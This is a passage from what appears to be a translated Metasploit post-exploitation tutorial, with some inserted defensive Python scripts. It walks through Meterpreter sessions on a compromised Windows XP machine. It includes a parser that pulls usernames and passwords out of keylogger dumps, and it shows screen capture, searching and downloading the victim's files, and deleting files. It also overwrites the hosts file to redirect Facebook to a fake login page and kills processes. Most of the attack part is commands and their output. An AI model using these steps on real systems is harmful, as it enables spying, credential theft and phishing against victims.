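        if key == "Return":
            lines.append("".join(current))
            current = []
        elif key == "Back" and current:
            current.pop()
        pos, token_before = m.end(), True
    current.extend(_unpad(dump[pos:], token_before, False))
    if current:
        lines.append("".join(current))
    return lines


def extract_fields(lines, keys=("username", "password")):
    """Pull 'label : value' lines out of the replayed text, e.g. a login form."""
    found = {}
    for line in lines:
        label, sep, value = line.partition(":")
        if sep and label.strip().lower() in keys:
            found[label.strip().lower()] = value.strip()
    return found


if __name__ == "__main__":
    for line in replay_keyscan(SAMPLE_DUMP):
        print(repr(line))
    print(extract_fields(replay_keyscan(SAMPLE_DUMP)))
```

Empty lines (the user pressing Enter twice) are kept, which is useful when matching the replay against form fields or a shell session.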
Now let's grab a screenshot of the target with the following commands. screengrab is provided by the espia extension, so we load that first:
meterpreter > use espia
Loading extension espia...
success.
Then we run screengrab:
meterpreter > screengrab
Screenshot saved to: C:/Program Files/Rapid7/framework/msf3/eJPgTrhD.jpeg
Bingo: the capture of the target's screen has been saved on our machine, in the msf3 directory that getlwd showed earlier.
Now let's practise searching the target for files with a particular extension from Meterpreter. The built-in help shows the options:
meterpreter > search -h
Usage: search [-d dir] [-r recurse] -f pattern
Search for files.
OPTIONS:
-d <opt>  The directory/drive to begin searching from. Leave empty to search all drives. (Default: )
-f <opt>  The file pattern glob to search for. (e.g. *secret*.doc?)
-h        Help Banner.
-r <opt>  Recursivly search sub directories. (Default: true)
meterpreter > search -f *.jpg
Found 151 results...
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (28521 bytes)
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg (71189 bytes)
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (83794 bytes)
c:\\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Winter.jpg (105542 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Clear Day Bkgrd.jpg (5675 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Fiesta Bkgrd.jpg (5048 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Glacier Bkgrd.jpg (2743 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Leaves Bkgrd.jpg (4389 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Maize Bkgrd.jpg (11748 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Nature Bkgrd.jpg (3781 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Pie Charts Bkgrd.jpg (2371 bytes)
c:\\Program Files\Common Files\Microsoft Shared\Stationery\Sunflower Bkgrd.jpg (17147 bytes)
c:\\Program Files\Messenger\fotorahasia.JPG (3263 bytes)
..
The advantage of Meterpreter's search is that, when no -d directory is given, it walks every drive on the target, unlike dir /s *.jpg which, run from c:\ for example, only searches drive C:.
Let's try pulling down fotorahasia.JPG; the command is:
meterpreter > download -r c:/progra~1/messenger/fotorahasia.JPG c:/asa
[*] downloading: c:/progra~1/messenger/fotorahasia.JPG -> c:/asa/fotorahasia.JPG
[*] downloaded : c:/progra~1/messenger/fotorahasia.JPG -> c:/asa/fotorahasia.JPG
fotorahasia.JPG has been copied to c:\asa on our machine.
Let's try a few more simple commands as an alternative to using shell: we move into c:\program files\messenger (the 8.3 short name progra~1 avoids having to quote the space) and delete fotorahasia.JPG. The steps are:
meterpreter > cd ..
meterpreter > cd progra~1
meterpreter > cd messenger
meterpreter > pwd
C:\progra~1\messenger
Setelah berada di c:\program files\messenger maka kita dapat tampilkan files didalamnya :
meterpreter > ls
Listing: C:\progra~1\messenger
==============================
Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2011-11-07 05:29:29 +0700  .
40555/r-xr-xr-x   0        dir   2011-09-17 20:36:28 +0700  ..
100666/rw-rw-rw-  33792    fil   2008-04-14 11:41:52 +0700  custsat.dll
100666/rw-rw-rw-  3263     fil   2011-11-07 05:27:50 +0700  fotorahasia.JPG
100444/r--r--r--  4821     fil   2007-04-03 05:37:24 +0700  logowin.gif
100666/rw-rw-rw-  7047     fil   2007-04-03 12:37:24 +0700  lvback.gif
100666/rw-rw-rw-  82944    fil   2008-04-14 18:42:00 +0700  msgsc.dll
100666/rw-rw-rw-  180224   fil   2008-04-14 12:00:30 +0700  msgslang.dll
100777/rwxrwxrwx  1695232  fil   2008-04-14 18:42:30 +0700  msmsgs.exe
100666/rw-rw-rw-  9306     fil   2001-08-23 20:00:00 +0700  newalert.wav
100666/rw-rw-rw-  18052    fil   2001-08-23 20:00:00 +0700  newemail.wav
100666/rw-rw-rw-  9306     fil   2001-08-23 20:00:00 +0700  online.wav
100666/rw-rw-rw-  4454     fil   2007-04-03 12:37:28 +0700  type.wav
100666/rw-rw-rw-  115981   fil   2007-04-03 12:34:02 +0700  xpmsgr.chm
Note the file fotorahasia.JPG; to delete it we can use rm:
meterpreter > rm fotorahasia.JPG
After running the command above, the directory looks like this:
meterpreter > ls
Listing: C:\progra~1\messenger
==============================
Mode              Size     Type  Last modified              Name
—-              —-     —-  ————-              —-
40777/rwxrwxrwx   0        dir   2011-11-07 05:48:35 +0700  .
40555/r-xr-xr-x   0        dir   2011-09-17 20:36:28 +0700  ..
100666/rw-rw-rw-  33792    fil   2008-04-14 11:41:52 +0700  custsat.dll
100444/r--r--r--  4821     fil   2007-04-03 05:37:24 +0700  logowin.gif
100666/rw-rw-rw-  7047     fil   2007-04-03 12:37:24 +0700  lvback.gif
100666/rw-rw-rw-  82944    fil   2008-04-14 18:42:00 +0700  msgsc.dll
100666/rw-rw-rw-  180224   fil   2008-04-14 12:00:30 +0700  msgslang.dll
100777/rwxrwxrwx  1695232  fil   2008-04-14 18:42:30 +0700  msmsgs.exe
100666/rw-rw-rw-  9306     fil   2001-08-23 20:00:00 +0700  newalert.wav
100666/rw-rw-rw-  18052    fil   2001-08-23 20:00:00 +0700  newemail.wav
100666/rw-rw-rw-  9306     fil   2001-08-23 20:00:00 +0700  online.wav
100666/rw-rw-rw-  4454     fil   2007-04-03 12:37:28 +0700  type.wav
100666/rw-rw-rw-  115981   fil   2007-04-03 12:34:02 +0700  xpmsgr.chm
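The two listings above differ in more than the missing JPG: the modification time of the directory itself (the "." row) moved from 05:29:29 to 05:48:35, because deleting a file updates the parent directory's timestamp. The following Python script is an added example for this page, not part of the original post or of Metasploit: it parses meterpreter `ls` output into records and diffs a before/after pair, which is the kind of check an investigator runs over two captured listings. The sample listings are a subset of the rows shown above; the parser and diff logic are this example's own.

```python
"""Parse two meterpreter `ls` listings and report what changed between them.

Added example (not from the original post or from Metasploit). The two sample
listings below are a subset of the rows shown on the page, with the en-dash
garbling in the permission field repaired.
"""
import re
from datetime import datetime

# One listing row: mode/perms, size, type, "YYYY-MM-DD HH:MM:SS +ZZZZ", name.
ROW_RE = re.compile(
    r"^(?P<mode>\d+)/(?P<perms>\S+)\s+(?P<size>\d+)\s+(?P<type>dir|fil)\s+"
    r"(?P<mtime>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} [+-]\d{4})\s+(?P<name>.+?)\s*$"
)

BEFORE = """\
Listing: C:\\progra~1\\messenger
==============================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2011-11-07 05:29:29 +0700  .
40555/r-xr-xr-x   0        dir   2011-09-17 20:36:28 +0700  ..
100666/rw-rw-rw-  33792    fil   2008-04-14 11:41:52 +0700  custsat.dll
100666/rw-rw-rw-  3263     fil   2011-11-07 05:27:50 +0700  fotorahasia.JPG
100444/r--r--r--  4821     fil   2007-04-03 05:37:24 +0700  logowin.gif
100777/rwxrwxrwx  1695232  fil   2008-04-14 18:42:30 +0700  msmsgs.exe
"""

AFTER = """\
Listing: C:\\progra~1\\messenger
==============================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2011-11-07 05:48:35 +0700  .
40555/r-xr-xr-x   0        dir   2011-09-17 20:36:28 +0700  ..
100666/rw-rw-rw-  33792    fil   2008-04-14 11:41:52 +0700  custsat.dll
100444/r--r--r--  4821     fil   2007-04-03 05:37:24 +0700  logowin.gif
100777/rwxrwxrwx  1695232  fil   2008-04-14 18:42:30 +0700  msmsgs.exe
"""


def parse_listing(text):
    """Return {name: record} for every file/dir row in a meterpreter ls dump.

    Header, separator and banner lines do not match ROW_RE and are skipped.
    """
    entries = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["size"] = int(rec["size"])
        rec["mtime"] = datetime.strptime(rec["mtime"], "%Y-%m-%d %H:%M:%S %z")
        entries[rec["name"]] = rec
    return entries


def diff_listings(before_text, after_text):
    """Diff two listings by name; a changed size or mtime counts as modified."""
    before, after = parse_listing(before_text), parse_listing(after_text)
    common = set(before) & set(after)
    return {
        "removed": sorted(set(before) - set(after)),
        "added": sorted(set(after) - set(before)),
        "modified": sorted(
            n for n in common
            if after[n]["size"] != before[n]["size"]
            or after[n]["mtime"] != before[n]["mtime"]
        ),
    }


if __name__ == "__main__":
    for kind, names in diff_listings(BEFORE, AFTER).items():
        print(f"{kind:9s} {names}")
```

Run against the page's own two listings, the diff reports `fotorahasia.JPG` as removed and `.` as modified, and nothing added: the directory timestamp is the trace a deletion leaves behind even when the file itself is gone.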
Now let's try poisoning the hosts file, which lets us redirect Windows name resolution to whatever IP address we want; this can be used for many things, for example a fake Facebook login and so on.
meterpreter > cd /windows/system32/drivers/etc/
meterpreter > pwd
C:\windows\system32\drivers\etc
Once we are in C:\windows\system32\drivers\etc, we first delete the hosts file and then upload the new one.
meterpreter > upload -r c:/asa/hosts c:/windows/system32/drivers/etc
[*] uploading  : c:/asa/hosts -> c:/windows/system32/drivers/etc
[*] uploaded   : c:/asa/hosts -> c:/windows/system32/drivers/etc\hosts
After the upload you can test it by pinging the domain that was added.
Now let's try terminating a Windows process with the kill command.
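The same file is the first thing to check from the defender's side: a stock Windows XP hosts file contains only the `127.0.0.1 localhost` line, so every additional entry is either deliberate administration or a hijack of name resolution like the one shown above. The Python script below is an added example for this page, not part of the original post or of Metasploit. It parses a hosts file and grades each non-default entry; the sample hosts content, the `WATCHLIST` of domains and the `BASELINE` set are constructed for the demonstration and should be adapted to the environment being audited.

```python
"""Audit a Windows hosts file for entries that hijack name resolution.

Added example (not from the original post or from Metasploit). The sample
hosts content, WATCHLIST and BASELINE below are constructed for this demo.
"""
import ipaddress

# Constructed watch-list: names that should never be overridden locally on a
# workstation (logins, update servers). Extend it for your own environment.
WATCHLIST = {
    "facebook.com",
    "login.live.com",
    "windowsupdate.microsoft.com",
    "update.microsoft.com",
}

# Entries that are legitimately present by default and are never reported.
BASELINE = {("127.0.0.1", "localhost"), ("::1", "localhost")}

# Constructed sample: a default line plus the kind of additions an audit sees.
SAMPLE_HOSTS = """\
# sample hosts file (constructed for this example)
127.0.0.1       localhost
0.0.0.0         ads.example.net         # blocking entry
192.168.56.10   www.facebook.com        # login redirected to a LAN host
192.168.56.10   facebook.com
10.0.0.5        intranet.example.local  # internal alias
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs; comments, blanks and malformed lines skip."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # first token is not an address
        for name in parts[1:]:
            yield str(ip), name.lower().rstrip(".")


def _watchlisted(name):
    """True if name is a watch-listed domain or a subdomain of one."""
    return name in WATCHLIST or any(name.endswith("." + w) for w in WATCHLIST)


def audit_hosts(text):
    """Return findings as (severity, ip, hostname, reason) tuples, in file order."""
    findings = []
    for ip_str, name in parse_hosts(text):
        if (ip_str, name) in BASELINE:
            continue
        ip = ipaddress.ip_address(ip_str)
        if _watchlisted(name):
            # A login or update domain pointed anywhere else is the poisoning
            # case described on the page: treat it as high regardless of target.
            findings.append(("high", ip_str, name, "watch-listed domain overridden"))
        elif ip.is_loopback or ip.is_unspecified:
            # Sinkholing a name to 0.0.0.0/127.0.0.1 blocks it rather than
            # redirecting it; common for ad-blocking, still worth listing.
            findings.append(("low", ip_str, name, "name sinkholed locally"))
        else:
            findings.append(("medium", ip_str, name, "name redirected to another host"))
    return findings


if __name__ == "__main__":
    for severity, ip, name, reason in audit_hosts(SAMPLE_HOSTS):
        print(f"[{severity:6s}] {ip:15s} {name:25s} {reason}")
```

Severity is decided by what is being overridden rather than by where it points: a watch-listed login or update domain is high regardless of the target address, because there is no legitimate reason for a workstation to resolve it through the hosts file. On a real host the content comes from `%SystemRoot%\system32\drivers\etc\hosts`, and the file's modification time compared with the system's patch history is the natural companion check.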
>>>ps
Process list
============
PID   Name              Arch  Session  User                 Path
---   ----              ----  -------  ----                 ----
0     [System Process]
4     System            x86   0
624   smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
696   csrss.exe
720   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
764   services.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
776   lsass.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
936   DF5Serv.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
972   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
1068  svchost.exe
1152  svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
1292  svchost.exe
1452  svchost.exe
1532  explorer.exe      x86   0        PC100\data           C:\WINDOWS\Explorer.EXE
1648  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
1184  wscntfy.exe       x86   0        PC100\data           C:\WINDOWS\system32\wscntfy.exe
1300  alg.exe
348   FrzState2k.exe    x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
2032  cmd.exe           x86   0        PC100\data           C:\WINDOWS\system32\cmd.exe
188   notepad.exe       x86   0        PC100\data           C:\WINDOWS\system32\notepad.exe
1176  sc.exe            x86   0        PC100\data           C:\WINDOWS\system32\sc.exe
1436  sc.exe            x86   0        PC100\data           C:\WINDOWS\system32\sc.exe
596   mshta.exe         x86   0        PC100\data           C:\WINDOWS\system32\mshta.exe
1556  mmc.exe           x86   0        PC100\data           C:\WINDOWS\system32\mmc.exe
1040  sc.exe            x86   0        PC100\data           C:\WINDOWS\system32\sc.exe
336   logon.scr         x86   0        PC100\data           C:\WINDOWS\System32\logon.scr
Let's try killing the cmd.exe process.
>>>kill 2032
Killing: 2032
>>>ps
Process list
============
PID   Name              Arch  Session  User                 Path
---   ----              ----  -------  ----                 ----
0     [System Process]
4     System            x86   0
624   smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe
696   csrss.exe
720   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM  \??\C:\WINDOWS\system32\winlogon.exe
764   services.exe      x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\services.exe
776   lsass.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\lsass.exe
936   DF5Serv.exe       x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\Faronics\Deep Freeze\Install C-0\DF5Serv.exe
972   svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\svchost.exe
1068  svchost.exe
1152  svchost.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
1292  svchost.exe
1452  svchost.exe
1532  explorer.exe      x86   0        PC100\data           C:\WINDOWS\Explorer.EXE
1648  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\spoolsv.exe
1184  wscntfy.exe       x86   0        PC100\data           C:\WINDOWS\system32\wscntfy.exe
1300  alg.exe
348   FrzState2k.exe    x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
188   notepad.exe       x86   0        PC100\data           C:\WINDOWS\system32\notepad.exe
1176  sc.exe            x86   0        PC100\data           C:\WINDOWS\system32\sc.exe
1436  sc.exe            x86   0        PC100\data           C:\WINDOWS\system32\sc.exe
596   mshta.exe         x86   0        PC100\data           C:\WINDOWS\system32\mshta.exe
1556  mmc.exe           x86   0        PC100\data           C:\WINDOWS\system32\mmc.exe
1040  sc.exe            x86   0        PC100\data           C:\WINDOWS\system32\sc.exe
336   logon.scr         x86   0        PC100\data           C:\WINDOWS\System32\logon.scr
Notice above that PID 2032, cmd.exe, has disappeared from the process list.
C:\windows\system32\drivers\etc>
Since there are many more meterpreter commands, feel free to experiment on your own; for guidance just type help and press enter, and meterpreter will list what it can do inside the metasploit framework.
>>>help
Core Commands
=============
Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information about active channels
close                     Closes a channel
detach                    Detach the meterpreter session (for http/https)
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
help                      Help menu
info                      Displays information about a Post module
interact                  Interacts with a channel
irb                       Drop into irb scripting mode
load                      Load one or more meterpreter extensions
migrate                   Migrate the server to another process
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
use                       Deprecated alias for 'load'
write                     Writes data to a channel
Stdapi: File system Commands
============================
Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
del           Delete the specified file
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
search        Search for files
upload        Upload a file or directory
Stdapi: Networking Commands
===========================
Command       Description
-------       -----------
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table
Stdapi: System Commands
=======================
Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
sysinfo       Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command        Description
-------        -----------
enumdesktops   List all accessible desktops and window stations
getdesktop     Get the current meterpreter desktop
idletime       Returns the number of seconds the remote user has been idle
keyscan_dump   Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop   Stop capturing keystrokes
screenshot     Grab a screenshot of the interactive desktop
setdesktop     Change the meterpreters current desktop
uictl          Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command       Description
-------       -----------
record_mic    Record audio from the default microphone for X seconds
webcam_list   List webcams
webcam_snap   Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command       Description
-------       -----------
getsystem     Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command       Description
-------       -----------
hashdump      Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command       Description
-------       -----------
timestomp     Manipulate file MACE attributes
If you get tired of working in meterpreter you can drop straight into a shell: just type shell and press enter.
meterpreter > shell
Process 1692 created.
Channel 7 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\windows\system32\drivers\etc>